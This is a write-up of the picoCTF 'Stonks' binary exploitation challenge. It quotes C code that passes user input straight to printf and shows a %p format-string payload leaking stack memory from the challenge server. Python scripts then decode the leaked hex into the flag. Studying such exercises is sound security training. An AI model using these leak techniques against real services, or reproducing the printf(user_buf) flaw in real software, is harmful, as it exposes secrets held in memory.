Points: 20
Category: Binary Exploitation
I decided to try something no one else has before. I made a bot to automatically trade stonks for me using AI and machine learning. I wouldn't believe you if you told me it's insecure! vuln.c
nc mercury.picoctf.net 33411
- Okay, maybe I'd believe you if you find my API key.
In the source code, if you look carefully at the buy_stock function, you can see this code snippet:
char *user_buf = malloc(300 + 1);
printf("What is your API token?\n");
scanf("%300s", user_buf);          /* up to 300 bytes of attacker-controlled text */
printf("Buying stonks with token:\n");
printf(user_buf);                  /* user input is used as the format string itself */
What is this actually? It's called a format string vulnerability: whatever we type into that scanf is passed to printf as the format string instead of as an argument, so if we input a specifier like %s, %d, %x, %p or %n, printf interprets it and gives us back the value that specifier would normally print.
In binary exploitation, a format string vulnerability is usually exercised with %p or %x to leak values off the stack. Judging by the source code, our flag is UNIQUE, so each player will have a different flag.
Knowing all this, it's time to leak the first 50 stack values using %p; I use python3 to print 50 copies of that specifier.
Welcome back to the trading app!
What would you like to do?
1) Buy some stonks!
2) View my portfolio
1
Using patented AI algorithms to buy stonks
Stonks chosen
What is your API token?
%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p
Buying stonks with token:
0x844d3d00x804b0000x80489c30xf7f9cd800xffffffff0x10x844b1600xf7faa1100xf7f9cdc7(nil)0x844c1800x10x844d3b00x844d3d00x6f6369700x7b4654430x306c5f490x345f74350x6d5f6c6c0x306d5f790x5f79336e0x633432610x366134310xffcd007d0xf7fd7af80xf7faa4400xd7c723000x1(nil)0xf7e39ce90xf7fab0c00xf7f9c5c00xf7f9c0000xffcdcc480xf7e2a68d0xf7f9c5c00x8048eca0xffcdcc54(nil)0xf7fbef090x804b0000xf7f9c0000xf7f9ce200xffcdcc880xf7fc4d500xf7f9d8900xd7c723000xf7f9c0000x804b0000xffcdcc88
Portfolio as of Mon Apr 10 06:37:44 UTC 2023
1 shares of E
1 shares of TW
177 shares of LP
61 shares of SXEX
20 shares of JD
209 shares of MBUY
138 shares of AIQJ
Goodbye!
It's a bunch of hex, but don't worry: CyberChef can tell us what it means, or you can just search for 7d, since that is the hex for }. We found this particular run of values interesting because it has 7d at the end and 6f636970 (ocip) at the start:
6f6369700x7b4654430x306c5f490x345f74350x6d5f6c6c0x306d5f790x5f79336e0x633432610x366134317d
If you decode this hex as a string, you'll find this:
ocip{FTC0l_I4_t5m_ll0m_y_y3nc42a6a41}
See the pattern? The flag format is always picoCTF{.*}, and in the result the characters appear swapped in groups of 4. That is because each %p prints one 4-byte stack word as a little-endian integer, so the bytes of every word come out in reverse order. What we can do is split the hex into 4-byte groups and print each group backwards, or do it by hand...
ocip -> pico
{FTC -> CTF{
0l_I -> I_l0
4_t5 -> 5t_4
m_ll -> ll_m
0m_y -> y_m0
_y3n -> n3y_
c42a -> a24c
6a41 -> 14a6
} -> }
I also wrote a simple script to do this using [::-1] and unhexlify:
from binascii import unhexlify

# Each leaked %p value is a little-endian 32-bit word, so reversing the
# 4 decoded bytes ([::-1]) restores the original byte order of the string.
flag = b"".join(
    [
        unhexlify("6f636970")[::-1],
        unhexlify("7b465443")[::-1],
        unhexlify("306c5f49")[::-1],
        unhexlify("345f7435")[::-1],
        unhexlify("6d5f6c6c")[::-1],
        unhexlify("306d5f79")[::-1],
        unhexlify("5f79336e")[::-1],
        unhexlify("63343261")[::-1],
        unhexlify("36613431")[::-1],
        unhexlify("007d")[::-1],  # low bytes of 0xffcd007d: "}" plus the string's NUL terminator
    ]
).rstrip(b"\x00").decode()  # drop the NUL that follows "}"
print(flag)
picoCTF{I_l05t_4ll_my_m0n3y_a24c14a6}
NOTE: Every Player has a different flag!
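As an added example (not part of the original writeup), here is a script that generalises the manual reassembly above: it splits the run-together %p output into individual words, undoes the little-endian byte order of every word rather than just the ten we picked by eye, and searches the rebuilt stack bytes for the flag pattern. It assumes 32-bit stack words, which matches the 0x0804xxxx and 0xffcdxxxx addresses in the leak.

```python
from __future__ import annotations
import re

# Constructed sample: the 50-word %p leak from the session above, copied
# verbatim (printf emits no separator, so the values run together).
LEAK = (
    "0x844d3d00x804b0000x80489c30xf7f9cd800xffffffff0x10x844b1600xf7faa110"
    "0xf7f9cdc7(nil)0x844c1800x10x844d3b00x844d3d00x6f6369700x7b465443"
    "0x306c5f490x345f74350x6d5f6c6c0x306d5f790x5f79336e0x633432610x36613431"
    "0xffcd007d0xf7fd7af80xf7faa4400xd7c723000x1(nil)0xf7e39ce90xf7fab0c0"
    "0xf7f9c5c00xf7f9c0000xffcdcc480xf7e2a68d0xf7f9c5c00x8048eca0xffcdcc54"
    "(nil)0xf7fbef090x804b0000xf7f9c0000xf7f9ce200xffcdcc880xf7fc4d50"
    "0xf7f9d8900xd7c723000xf7f9c0000x804b0000xffcdcc88"
)


def parse_leak(line: str) -> list[int]:
    """Split a run-together %p leak into integers, one per stack word.

    Hex digits never contain 'x', so every "0x" (and every "(nil)", which is
    how glibc prints a NULL pointer) marks the start of a new value.
    """
    tokens = [t for t in re.split(r"(?=0x|\(nil\))", line.strip()) if t]
    return [0 if t == "(nil)" else int(t, 16) for t in tokens]


def leak_to_bytes(words: list[int], word_size: int = 4) -> bytes:
    """Rebuild the stack bytes in memory order.

    x86 is little-endian, so %p shows each word's bytes reversed; undoing that
    per word is the writeup's [::-1] trick applied to every word.  Pass
    word_size=8 for a 64-bit target (assumption; this binary is 32-bit).
    """
    return b"".join(w.to_bytes(word_size, "little") for w in words)


def find_flag(line: str, word_size: int = 4) -> tuple[str, int] | None:
    """Return (flag, 1-based index of the %p argument it starts at), or None."""
    image = leak_to_bytes(parse_leak(line), word_size)
    match = re.search(rb"picoCTF\{[^}]*\}", image)
    if match is None:
        return None
    return match.group().decode(), match.start() // word_size + 1


if __name__ == "__main__":
    print(find_flag(LEAK))
```

The returned index tells you which positional argument the flag starts at, which is what you would need to know to read it back with far fewer than 50 specifiers.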